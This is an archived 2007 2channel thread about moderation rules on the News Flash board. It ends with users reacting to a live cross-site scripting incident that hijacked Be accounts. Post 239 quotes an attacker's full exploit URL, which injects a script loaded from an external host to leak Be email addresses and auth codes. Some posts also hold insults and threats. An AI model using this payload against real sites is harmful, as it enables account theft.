X



トップページ運用情報
1001コメント255KB
【news】ニュース速報運用情報42【ν】
レス数が1000を超えています。これ以上書き込みはできません。
0001動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
561 名前:FOX ★[sage] 投稿日:2007/06/07(木) 20:18:27 ID:???0
「嫌なら出てけ」

http://qb5.2ch.net/test/read.cgi/sakud/1131629475/561
---
前スレ
【news】ニュース速報運用情報40【ν】
http://qb5.2ch.net/test/read.cgi/operate/1195157071/

ニュース速報板(http://news23.2ch.net/news/)

*ここは「saku」をお願いするスレッドでは御座いません

■関連スレッド
自治スレ491
http://news23.2ch.net/test/read.cgi/news/1195895163/
ニュース速報@削除議論
http://qb5.2ch.net/test/read.cgi/sakud/1131629475/
■ニュース速報@運用議論スレ 8.1
http://etc6.2ch.net/test/read.cgi/dataroom/1181206570/
0002動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 19:15:28ID:Y2YlNkaRP
427 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2007/06/14(木) 19:56:20 ID:m4Ppi8Ob0
>>387
アンケートスレはスレタイの遊びの範囲ならOK
アンケートのために適当なニュースソースを張ってる場合は不可

スレタイの遊びの範囲の例をしめすと

高所得でグルメなニュー速民のお前らならマックよりモスだよな
(モスの新製品のニュースの本文&URL)

は×?

451 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2007/06/14(木) 19:58:22 ID:???0 ?S★(1001111)
>>427
高所得でグルメなニュー速民のお前らならマックよりモスだよな
(モスの新製品のニュースの本文&URL)

OK

http://qb5.2ch.net/test/read.cgi/operate/1181680138/427,451
0003動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 19:15:53ID:Y2YlNkaRP
---
471 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2007/06/14(木) 20:00:03 ID:???0 ?S★(1001111)
ネタスレ・クソスレ・実況は不可
アニメ、声優などのオタスレも不可
ゲームはアニメ、声優ネタなら不可
zip、クレクレ等、偽装スレも不可
意味不明なスレタイは不可
ただし、スレタイの遊びは、エロ、差別、アニメ、声優ネタ以外は許容


一行ソースでも重要性の高いニュースならOK
スポーツ、芸能もOK
アンケートスレはスレタイの遊びの範囲ならOK
アンケートのために適当なニュースソースを張ってる場合は不可

http://qb5.2ch.net/test/read.cgi/operate/1181680138/471
0004動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 19:16:13ID:Y2YlNkaRP
833 名前:FOX ★[sage] 投稿日:2007/11/04(日) 03:31:34 ID:???0
>>819


今後のぼくたちの予定(改)

今月 新板でも作ろうかしら(ぼく)
来月 とくにイベントはないのでお正月にそなえる。(きみたち)
来年 だらだらとすごす(きみたちと僕)
再来年 本気出す。10周年記念の年じゃ。はりきってみようと思う。(ぼく)

http://qb5.2ch.net/test/read.cgi/operate/1193401554/833

---

909 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2007/11/04(日) 03:44:33 ID:DIqN4F+y0

FOX出て来い
ニュー速の規制緩和を要求する
50秒規制にするんだ

919 名前:FOX ★[sage] 投稿日:2007/11/04(日) 03:50:44 ID:???0
>>909

どうせみんな年末はデートとかあって忙しいだろ?
2ちゃんねるやってる暇なんかないだろ?

必要ないじゃんさ

http://qb5.2ch.net/test/read.cgi/operate/1193401554/909,919
0005動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 19:17:11ID:3nH9gq6KO

(⌒─-⌒)
((´・ω・`))
( つ旦O ズズー
と_)_)
0006 ◆FUJIMAN/GQ
垢版 |
NGNG
☆   。    +           。    ☆
                  。
       *    ★        +☆      ☆
  ☆ ・              ☆        ☆
             (⌒─-⌒)
              ((´・ω・`))  
              / つ¶つ¶
             / ̄ ̄ ̄ ̄\
              |) ○ ○ ○ (|
          /″   ν.    \  ウィンウィン
  (( (( ((  /________\  ウィンウィン
         ̄ \_\__/_/  ̄
0007動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 19:26:52ID:3nH9gq6KO

(⌒─-⌒)
((´・ω・`))
( つ旦O フジマンカッコイイノ♪
と_)_)



(⌒─-⌒)
((´・ω・`))
( つ旦O コノスレハミンナデナカヨクツカッテナノ♪
と_)_)
0011動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 20:43:39ID:rio22CFP0
336 :ひろゆき :05/01/05 16:30:18 ?## ID:JwxiyunE
>>334
情報が報じられているかどうかが重要で、
速いかどうかは2の次だと思うのですが、、
0012動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 20:50:09ID:hDy4SC7p0
古いソースで語りたいなら議論板に行けばいいじゃん
どんなに古くてもいいのだから
速報板になっている以上日付は重要
それにそんなコピペ改変できるし馬鹿じゃないの?
0014動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 20:51:06ID:3nH9gq6KO
ニュース「速報」だぞ馬鹿
0015動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 20:54:53ID:rio22CFP0
一々言わないと分からない厨房が増えた
さじ加減ですよ。さじ加減。TPO。

明日、審議に入る。今立っていても問題ない。
記事の内容的には新しい。
0018動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 20:59:51ID:rio22CFP0
またかよ、全てを否定している訳じゃないだろうに。
スレッドは1が全てじゃない2以降がある訳ですよ?
ヘッドライン板じゃないんだから。1が全て最新である
必要は無いでしょ。
0022動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:01:29ID:NWyt/xjM0
あの時現場見てたけどひろりんが依頼持ってきてゴネて
周りの記者はオロオロして面白かったな

そうそう+でもいいんならこんなのも見つけましたよぐんまんさん!
懐かしいですね!

http://news5.2ch.net/test/read.cgi/newsplus/1067688274/405

405 名前:ひろゆき ◆3SHRUNYAXA 投稿日:03/11/08 14:55 ID:oHf5kIX4
4日というのは絶対的な条件ではなく、
鮮度のよくない情報がN+に残り続けないための手段の一つです。
鮮度のよくない情報がN+に残り続けるのであれば、
4日以内でも不要と考えてます。
0024動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:03:04ID:rio22CFP0
成立する前に立てているんだから、ある意味「速報」ですね
今、動いている話なら多少古くても問題ないと思うね
「○○が事故が発生」というネタが何年も前なら問題だろうけど。
そういう類じゃない訳だ。何でも一律に日付だけで判断する事の
無意味さを悟ろうな。
0026動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:04:31ID:NWyt/xjM0
明日審議に入ると。
探してきてそのソースで立てたらどうですかね


こんな所で油売ってないでさっさとお願いします
0029動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:07:31ID:rio22CFP0
ルールで縛り付けたいなら、さっさと声優やアニメを禁止したら、どうですかね。
出来ないじゃん。何日ルールが好きなら+に逝け

臨機応変に対応出来る事の意義を知れ
単に反論の為の反論なんて無意味だよ

スレストの無能さが具体的に明らかにされて、くやしいのうw
0033動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:16:35ID:rio22CFP0
削除人やスレストのご機嫌に合わせてスレッドを立てる訳じゃない。
気に入らないなら、この掲示板の責任者の考え(現在)を
明確に示す事しかありませんね。

それが無いならスレを立てる人間が判断する。
削除人やスレストは掲示板の主役では無い。邪魔をしないように行動しろ。
0035動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:23:10ID:UBk9YvNS0
ニュースにも速報にも興味がない住人ばかりなら、ニュース速報なんて名前やめてしまえばいいのに。
0038動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:27:16ID:rio22CFP0
「嫌かどうか」と「間違いかどうか」に何か関連があるの
間違いを指摘されるのが嫌な奴が出て行けばいい。

そもそも俺は管理人に「2ちゃんねるに向いてない」と言われているので。
(自分で管理人の間違いを指摘したスレを立てて、そこで言われた。)
0040動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:31:33ID:rio22CFP0
別に自慢では無くて事実。
俺に何を言っても無駄な事を悟らせたいだけだよw
管理人の言う事なら「2ちゃんねるに於いては」絶対なんでしょ?

ボランティーアの諸君に言い聞かせているんだよw
0041動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:34:27ID:rio22CFP0
121 名前:ひ@どうやら管理人 ★[] 投稿日:2006/07/30(日) 08:18:23 ID:???0 ?BRZ(4603)
>>117
やっぱりあなた2chに向いてないですよ。

>>105
>>107まで書いてもらって理解できないのであれば、
どうしようもないかと。

西村が「掲示板から出て行け」とか言いやがった。おまえが間違ってるじゃろ。認めろや。ボケカス
http://mimizun.com/log/2ch/news/news20.2ch.net/test/read.cgi/news/1154211623/

諦めて頂くのが賢明  か と  w
0043動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:39:06ID:UBk9YvNS0
本人かそうでないか、本人しかわからねーだろ。
0046動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:49:16ID:UBk9YvNS0
FOX★かひろゆきが得する条件を提示しないと、粘着したところで意見が通ることはないと思うよ。
0047動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:51:31ID:rio22CFP0
俺は何も提示とか提案の話はしていない
数日前のソースで停めちゃう削除人やスレストが
根拠を示せば良いだけの話
0049動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 21:59:29ID:rio22CFP0
>>48
別に俺が立てた訳じゃないしねぇ。
削除議論に持って行っても何もならないよ?
なんでかって前スレでも書いたけど、
ルールに無い事で作業しているので、
「自分の判断で停めました」

これ以外無いわけ。

で、そういうスレは基本的にボランティア側の考え(擁護)が主。
だから名無しの俺が書いても何も意味が見いだせない

それに回答する義務も無い。

過去に何度も見ているけど、マスコミソースに無い速報スレを
何度も消してきて、そんな類のスレで問題を指摘しても
何ら回答が無かったよ。それくらい削除人なんて、いい加減な人間ばかり。
自己保身と自己弁護の塊。都合の悪い事は徹底して無視する教育が施されているw
0050動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:00:23ID:pzbi4K2i0?2BP(100)
最近へが異常に臭いんだけど・・・どーなちゃったの、俺の腸は
0051動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:06:11ID:tjHlDujI0
>>49
宿題
・このスレに書いても無駄だということを理解しましょう
・ガス抜きは自治スレで出来るように努力しましょう
0057動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:10:06ID:UBk9YvNS0
ルールを決めても、それをかいくぐるのが得意なやつばかりだから意味薄いよ。
特定の削除人の胸先三寸が気にくわないなら、その削除人とっつかまえて言えよ。
無理なら、せめて名指しで。

>>50
肉の食い過ぎじゃね?
0058動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:10:14ID:rio22CFP0
俺に文句言うなら、馬鹿な焼き兵辺りを指導しとけよw
名無しでコソコソ書いてるのがバレたりとかして恥ずかしくないの?
最初から出して書けばいいじゃない。

そういう姑息な態度の方が問題だよw
0059動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:12:04ID:rio22CFP0
それと「言霊」とか言う人、
あの人は自治スレでキャップ出してスレの事を、とやかく意見していますが
あれは「恣意的な自治介入」に当たりますね
0064動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:21:43ID:UBk9YvNS0
>>62
>>50は君じゃないだろ。
0066動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 22:24:53ID:5ft7nA0I0
VIPでやれよ
0069動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/26(月) 23:35:30ID:XVTb/cE70
このスレの住民の中でも群を抜いてキモい人がいると聞いて観て見たら想像以上でした
いいもん見せてもらいました、では帰ります
0076動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 05:35:01ID:tpn1IoVO0
良スレ一覧

もっと評価されてもいいと思うアーティイスト
http://news23.2ch.net/test/read.cgi/news/1195855907/
お前らって女の子に「こんにちは〜」とか「バイバーイ♪」とか挨拶されるだけでキョドりそうだよな・・
http://news23.2ch.net/test/read.cgi/news/1196065359/
Wiiが教えてくれたこと
http://news23.2ch.net/test/read.cgi/news/1196055988/
ニュー速民て何だかんだで優しいよね
http://news23.2ch.net/test/read.cgi/news/1195989887/
PLAYSTATION3でBDビデオが正常に再生されない不具合。発売中止、全製品回収へ
http://news23.2ch.net/test/read.cgi/news/1196043102/
松野氏がオウガシリーズ新作開発中?
http://news23.2ch.net/test/read.cgi/news/1195993797/
Vistaって、少なくともMeよりマシじゃないですか
http://news23.2ch.net/test/read.cgi/news/1195927189/
飯野賢治さん、「そろそろゲームのことを語ろうか。」 知られざる裏事情を暴露
http://news23.2ch.net/test/read.cgi/news/1196016618/
日本人ならカキは生、カキフライなんて邪道もいいところ
http://news23.2ch.net/test/read.cgi/news/1195902834/
0077動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 06:16:18ID:dS+Tpu5X0
ガキは文節を読めないから困るな。
前後の文章を無視して批判する、どこかの団体やメディアに似ているw
非常に興味深い
0078動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:08:09ID:BIZWP6Ke0
>また「勝った、負けた」か。興味の無い論点だな。

>完璧にスレストが敗北ッスねw
0080動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:28:51ID:BIZWP6Ke0
いや、君の主張に一貫性が無いだけでしょ。
0082動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:44:51ID:aBGLO7AK0
>>71
前に伸びる伸びないは関係ない
俺は誰よりも伸びないスレを立てられるとか言ってたな

ころころ変わるよねこの人w
0083動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:47:40ID:0MH5bn+50
一々説明してあげないと分からない
ゆとり世代には呆れるなw

まぁ、スレストした事が「過ち」だったと言う事でw

スレストは引退してくださいね。不必要な人材である。
0085動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:54:44ID:0MH5bn+50
よく文章を読めよw マジで。
ホントおかしな人だな。

すごく短い文章ですよwwwwwwwwwwwwww
0086動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:55:04ID:aBGLO7AK0
ちょっとマジでLO害化してきた
「特別」はいけないよ
ぐんまんも言ってたよ
だったらソース見つけてくる努力しろ
って
0088動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:57:08ID:aBGLO7AK0
言い負かされそうになると長文書くのに
都合悪い時は一々わからないのか!って
説明できないんだものなぁ

そんなおじいちゃんいるよねw
0089動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 07:57:24ID:0MH5bn+50
スレストはルールに無い事で勝手な対応をしました。
西村氏の責任です(削除人には一切、責任はありません)
掲示板を預かる身でありながらコミュニティーを否定する姿勢には呆れますね
0091動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 08:00:49ID:0MH5bn+50
調べれば分かる事を説明する義務等ありません。

これは、ここの管理人も言っています。

自分の手抜きを指摘されて
他人のせいにするのは間違いだよ

N速のスレストは役立たず。
0093動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 08:05:12ID:0MH5bn+50
スレストなんて必要なんですかね?
スレストする理由や目的が曖昧だから
余計な事をするんじゃないの?

理由も目的も無く与えられた玩具で遊びたいだけ?

そのくらいの事をさ、分かってないの?誰が削除人の責任者なんだ?
削除人を纏めている人くらい居るんでしょ?

ここに連れてこいや。説教してやる。
0095動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 08:12:26ID:0MH5bn+50
>>94
削除議論?嫌いなんですよね。前にも書いているけど。
あ〜いう腐った連中の意見等、何の参考にもならんね。

全否定と言う事です。
0097動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 08:15:31ID:0MH5bn+50
一度、私が考える板の事やスレ立てポリシーについて纏めて書きますよ。
時間をくれ。俺が見て感じてきた数年の集大成的なものを作る。
0099動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 08:34:57ID:/JAfEHjWO
>>97
無駄にレス消費するから他でやってね
直接言うのではなく、ここで垂れ流しされるのは迷惑
自己満足でしょ
その腐った連中を相手にするべき
そこにFOX現れるし
0102動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 09:08:39ID:0MH5bn+50
削除議論とか、よく逝くなw
気色悪いコテハンだらけで吐き気がする
ある意味、防火壁になっている気もするw
0103イオナ
垢版 |
2007/11/27(火) 11:31:55ID:9WWu2e3DO
>>97
楽しみにしてるから出来るだけ早く書いてナNo☆
0104動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 11:49:13ID:j+2iG4C40
板名から「ニュース」っての外してくれないかな
「ν」でも「N」でもいいから変えて欲しい
それならソース云々は文句いわないよ
0110イオナ
垢版 |
2007/11/27(火) 16:01:25ID:9WWu2e3DO
>>97
実は、今、私も私が愛する板について、最後の総仕上げとして、長―い長―い長文を書いてるのだけど、貴方より私の方が早く書けたナNo〜!!!!! うふ
まだまだ、人間的な自立が何か、「好き」と「愛」の違いは何かを書くのだけど、自分が出て行くにあたり、住人に板の使い方を理解して出て行かないとナNo☆
心配ナNo。
0114動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 19:59:43ID:7NUa2fdoO
ルーラ機能による混乱の責任取って潔く死んでくれ
頼んだぞ
0117動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 20:16:04ID:iChn/GfcO
(´・ω・`)マンマー
0121動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/27(火) 21:34:48ID:9CMkI5d4O
VIPを住みやすくしようがしまいがニュー即がこんなに緩いんじゃ
こっちで立てたくなるよなあ
じっくり雑談したいならソースくっつけてニュー即でお仲間をまった方が
流れに巻き込まれて無視されにくいから
いいもんなぁ
0127動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 00:04:06ID:2YxBOJMn0
>>126
来なくていいよ
0134動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:02:16ID:SgVLBJDC0?PLT(12000)
リンク踏んでないのに焼かれた
0135ひろゆき@どうやら管理人 ★
垢版 |
2007/11/28(水) 01:02:52ID:???0?S★(1012558)
修正。
0137たこ焼き ★
垢版 |
2007/11/28(水) 01:04:00ID:???0
おお・・・
0140動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:04:10ID:Ed0yF/wz0?2BP(20)
>>135
0141フェンリル ◆be/xFEN/R.
垢版 |
2007/11/28(水) 01:04:15ID:3Qr1hIFh0?DIA(299004)
>>135
be返せ屑、殺すぞ
0145動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:04:29ID:M1e6axQE0
>>141
ざまあwww
0153肉VIP ◆OOO/nkVIPo
垢版 |
2007/11/28(水) 01:05:18ID:PxAl3RU00?PLT(13457)
焼かれた?

0158動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:05:43ID:AYVn7AfC0?2BP(6565)
焼かれた
0160動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:05:47ID:L7pLkBpp0
丸焼きワロタ
0161動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:05:49ID:BiWEf42U0
>>135
許さないブボボ(`;ω;´)モワッ
0162動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:05:55ID:S97IQ+ez0
焼かれたbeの復活って出来るんかいな?
0166動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:11ID:I3HuDW2p0
\(^o^)/オワタオワタ
0173動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:35ID:aJ8hP1Aw0
>>135
空気嫁よ!
それでもタラコついてんのか!
0177動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:37ID:22nhLZAn0
>βテスト中なので、何らかの不具合が起こるかもしれません。
>それでも平気な人だけ登録してください。

>βテスト中なので、何らかの不具合が起こるかもしれません。
>それでも平気な人だけ登録してください。

>βテスト中なので、何らかの不具合が起こるかもしれません。
>それでも平気な人だけ登録してください。
0182動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:46ID:ef3i9wft0
あのスレに居る奴等全員焼いただろ
0184動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:48ID:/wLCrsws0
VIPのクズどものコテ以外は救済してやってくれ
0185動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:52ID:M1e6axQE0
まだ穴だらけだろうな
0187動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:06:57ID:4Quf3W4z0
be全部リセットでいいよ
0190動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:07:01ID:Q9eWVOG90
嘘を嘘とってことだな
0193動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:07:18ID:vfVA6ch60
(^o^)ノヤキハラエー
0194動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:07:29ID:6vrIwxtJ0
救済措置は?

モリタポ購入特需発生でウマウマ?
0195動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:07:36ID:I3HuDW2p0?2BP(1450)
てs
0199動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:01ID:B5UbRTld0
>>184
コテは全部放置でいいよ
0200動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:04ID:jdJY4yB20
どうなってんだ
0201クララ
垢版 |
2007/11/28(水) 01:08:06ID:NsOeTbnm0?PLT(16073)
ちょっと待て何で俺が焼かれてるんだよw
0203動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:19ID:huwoJDIN0?2BP(2490)
Fack youハゲタラコ
0209動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:34ID:0ME7KM++0
       /ニYニヽ
   (ヽ   /( ゚ )( ゚ )ヽ   /)
  (((i ) /::::⌒`´⌒::::\  ( i)))  ざまあみろwwwwwwwwwwwwwww
 /∠_| ,-)___(-,|_ゝ \
( ___、  |-┬-|    ,__ )
    |    `ー'´   /´
    |         /
0211ふゆう ◆Huyuu..GNg
垢版 |
2007/11/28(水) 01:08:42ID:TqadiPGuO?PLT(12001)
(^o^)ノ 焼き払われー
0212動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:48ID:YXdVvOpS0
金返せはげたら古
0213動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:08:52ID:S97IQ+ez0
>>187
なるほど。それで救済するんですか・・・ってオイw
0217動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:09:02ID:gcLGOiVo0?PLT(48017)
なんだ
0219動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:09:15ID:NsOeTbnm0?PLT(16073)
>>208
え、そうなの?良かった・・・のか?
0222 ◆FUJIMAN/GQ
垢版 |
2007/11/28(水) 01:09:23ID:rRDdp90j0?PLT(26004)
ひろゆきも実は踏んだw
0229@株主 ★
垢版 |
2007/11/28(水) 01:09:58ID:OLgRr07I0
じゃあ踏んで来ようかな
0230動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:10:00ID:DyV3F6vkP?PLT(17002)
なんだよもう!
0231動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:10:01ID:oDZdm2ai0?PLT(12000)
てすてす
0234動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:10:16ID:/A9t37TB0?PLT(12000)
ニュー速でスレ立てた奴永久アク禁でいいよもう
俺びっくりしちゃった
いつもクソプログラム公開してるけど
今回ばかりは許せんな
死ね死ね死ね
0238 株価【862】 ETPlayer ◆Q0z6O3qETw
垢版 |
2007/11/28(水) 01:10:36ID:LlSPjrDcO?PLT(20224)
仕事早いな
0239動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:10:39ID:mANgvz900
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見 その2★
http://news23.2ch.net/test/read.cgi/news/1196179103/218

218 名前: 40歳無職(三重県)[sage] 投稿日:2007/11/28(水) 01:09:11 ID:uuFnxPaY0

対策されてしまった。
と言う訳で第二弾。

http://z.la/t4b0m (短縮URL)
http://qb6.2ch.net/_boo80/boo80.swx?boo80=%3Cscript%20src%3D%22http%3A%2F%2Fmoyashi%2Esosite%2Ejp%2Fxss%2Fload%2Ejs%22%3E%3C%2Fscript%3E

鱈子は修正頑張ってください。

0243動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:11:03ID:NweVf83r0?2BP(6012)
どれどれみそら
0245動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:11:22ID:u5LrNLi50?2BP(100)
ひろうきのあほー
0249動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:11:54ID:6vrIwxtJ0
未知の攻撃で、まったく予知できなかったんだが…
0250動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:11:56ID:SgVLBJDC0
>>227
ワロタ
0252動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:12:13ID:/A9t37TB0?PLT(12000)
ニュー速の終わりの始まりのお知らせ
0256動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:12:37ID:ef3i9wft0?PLT(12350)
0257ソフィー ◆Zwdurge/wE
垢版 |
2007/11/28(水) 01:12:47ID:Mpv3JFmd0?S★(661485)
どうなっとんじゃぁあああああああああああああああああああああああ
0261動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:14:44ID:mANgvz900
もうすべてのbeを暫定的に停止するしかないな。
おっさんの風邪が治ったらクッキー対策ってことで
0262動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:14:45ID:6vrIwxtJ0

0263動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:14:57ID:IPcjqu6y0
たらこわしの10万円どうしてくれんの?
もちろん救済はあるんだよな?
0267クララ
垢版 |
2007/11/28(水) 01:16:05ID:NsOeTbnm0?PLT(16073)
おい誰か狐の病室にノートPC投げ込んでこいよ
0271動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:17:01ID:D5FtEGgN0
be時代の終焉か・・・
0273動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:17:20ID:qqQnUZGl0?2BP(4555)
ひろゆき俺にレスしてくれ
頼む!
0275動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:17:49ID:9846KKAN0
バーカバーカ
0276動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:17:51ID:RRcodG2Y0?BRZ(10000)
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
0281動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:18:30ID:uC6Jet6v0
>>269
被害wwwwwwwwwwwwwwwwwwww

>βテスト中なので、何らかの不具合が起こるかもしれません。
>それでも平気な人だけ登録してください。

これ読まなかったの?wwwん?wwwww
0283動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:18:40ID:IdGasicj0
    ,ィィr--  ..__、j
   ル! {       `ヽ,       ∧
  N { l `    ,、   i _|\/ ∨ ∨
  ゝヽ   _,,ィjjハ、   | \
  `ニr‐tミ-rr‐tュ<≧rヘ   >  これは運営による盛大な
     {___,リ ヽ二´ノ  }ソ ∠   自演に違いない!!
    '、 `,-_-ュ  u /|   ∠
      ヽ`┴ ' //l\  |/\∧  /
--─‐ァ'| `ニ--‐'´ /  |`ー ..__   `´
    く__レ1;';';';>、  / __ |  ,=、 ___
   「 ∧ 7;';';'| ヽ/ _,|‐、|」 |L..! {L..l ))
   |  |::.V;';';';'| /.:.|トl`´.! l _,,,l | _,,|  , -,
    ! |:.:.:l;;';';';'|/.:.:.:||=|=; | |   | | .l / 〃 ))
    l |:.:.:.:l;';';'/.:.:.:.:| ! ヽ \!‐=:l/ `:lj  7
    | |:.:.:.:.l;'/.:.:.:.:.:.! ヽ:::\::  ::::|  ::l /
0285動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:19:34ID:S97IQ+ez0
漏れたメアドに新しい認証コード発行して・・・
とか面倒だから絶対やらないだろうなw

焼かれたbeはもう戻らない・・・
0286動け動けウゴウゴ2ちゃんねる
垢版 |
2007/11/28(水) 01:20:35ID:Q9eWVOG90

         ナ ゝ   ナ ゝ /    十_"    ー;=‐         |! |!
          cト    cト /^、_ノ  | 、.__ つ  (.__    ̄ ̄ ̄ ̄   ・ ・
ミミ:::;,!      u       `゙"~´   ヾ彡::l/VvVw、 ,yvヾNヽ  ゞヾ  ,. ,. ,. 、、ヾゝヽr=ヾ
ミ::::;/   ゙̄`ー-.、     u  ;,,;   j   ヾk'! ' l / 'レ ^ヽヘ\   ,r゙ゞ゙-"、ノ / l! !ヽ 、、 |
ミ/    J   ゙`ー、   " ;, ;;; ,;; ゙  u ヾi    ,,./ , ,、ヾヾ   | '-- 、..,,ヽ  j  ! | Nヾ|
'"       _,,.. -─ゝ.、   ;, " ;;   _,,..._ゞイ__//〃 i.! ilヾゞヽ  | 、  .r. ヾ-、;;ノ,.:-一'"i
  j    /   ,.- 、  ヾヽ、 ;; ;; _,-<  //_,,\' "' !| :l ゙i !_,,ヽ.l `ー─--  エィ' (. 7 /
